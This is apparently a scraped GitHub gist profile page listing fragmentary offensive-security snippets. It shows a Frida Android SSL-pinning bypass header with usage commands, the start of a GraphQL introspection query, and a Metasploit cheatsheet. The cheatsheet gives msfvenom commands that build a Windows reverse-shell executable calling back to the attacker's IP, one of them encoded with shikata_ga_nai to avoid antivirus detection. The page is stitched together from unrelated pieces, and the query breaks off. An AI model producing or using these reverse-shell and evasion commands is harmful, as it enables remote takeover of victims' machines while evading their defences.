Skip to content

Instantly share code, notes, and snippets.

View thevillagehacker's full-sized avatar
🎯
Focusing

Naveen J thevillagehacker

🎯
Focusing
View GitHub Profile
/*
Android SSL Re-pinning frida script v0.2 030417-pier
$ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt
$ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
UPDATE 20191605: Fixed undeclared var. Thanks to @oleavr and @ehsanpc9999 !
*/
@thevillagehacker
thevillagehacker / Metasploit-cheatsheet.md
Created February 26, 2021 08:48
Metasploit cheatsheet

Metasploit Revershell CheatSheet

Msfvenom: 
msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe -o shell_reverse.exe

To avoid AV detection, use encryption

msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name